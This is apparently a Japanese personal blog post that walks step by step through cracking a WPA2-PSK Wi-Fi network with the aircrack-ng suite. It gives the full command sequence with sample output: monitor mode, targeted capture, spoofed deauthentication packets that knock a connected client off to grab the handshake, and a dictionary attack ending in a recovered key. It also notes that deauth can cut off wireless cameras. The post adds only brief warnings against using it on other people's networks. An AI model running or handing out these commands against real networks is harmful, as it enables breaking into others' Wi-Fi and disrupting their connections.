wepは前にやったけどwpaはまだやってないからやってみた
wlan0をモニターモードに
#
airmon-ng start wlan0APを列挙
#
airodump-ng mon0 CH 1 ][ Elapsed: 0 s ][ 2011-10-10 20:39
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:CF:AA:AA:AA -59 2 10 0 1 54e. WPA2 CCMP PSK
BSSID STATION PWR Rate Lost Packets Probes
00:22:CF:AA:AA:AA 00:22:CF:BB:BB:BB -63 0e- 0e 1 10
^C
状況:
00:22:cf:aa:aa:aaがターゲットAP
ターゲットには別クライアント00:22:cf:bb:bb:bbが接続中
パケットをキャプチャ開始
#
airodump-ng --bssid 00:22:CF:AA:AA:AA -c 1 -w wpa mon0ソースアドレスを偽装したDeAuthパケットを送信してターゲットAPからクライアントを切断させ、その際に発生するWPAハンドシェイクパケットをかすめ取る
#
aireplay-ng -0 20 -a 00:22:CF:AA:AA:AA -c 00:22:CF:BB:BB:BB mon021:01:46 Waiting for beacon frame (BSSID: 00:22:CF:BB:BB:BB) on channel 1
21:01:46 Sending 64 directed DeAuth. STMAC: [00:22:CF:BB:BB:BB] [19|64 ACKs]
21:01:46 Sending 64 directed DeAuth. STMAC: [00:22:CF:BB:BB:BB] [19|64 ACKs]
21:01:46 Sending 64 directed DeAuth. STMAC: [00:22:CF:BB:BB:BB] [19|64 ACKs]
:
大体10~20くらいDeAuthを送るとハンドシェイクパケットを入手できる。
このDeAuthパケットを送る機能は無線LANカメラや不正クライアントの切断とかにも使えたりする。他人のAP、クライアントにはやっちゃダメだよ
WPAハンドシェイクパケットが入手できたら辞書クラック開始
#
aircrack-ng wpa-01.cap -w password.lst Aircrack-ng 1.0
[00:00:00] 16 keys tested (176.17 k/s)
KEY FOUND! [ roottoor ]
:
WPAハンドシェイクパケットさえ手に入れば、あとは自宅に持ち帰ってデカい辞書ファイルとハイスペックマシンでゆっくりと料理してやればおk
他人のAPではやっちゃダメだよ
- 関連記事
-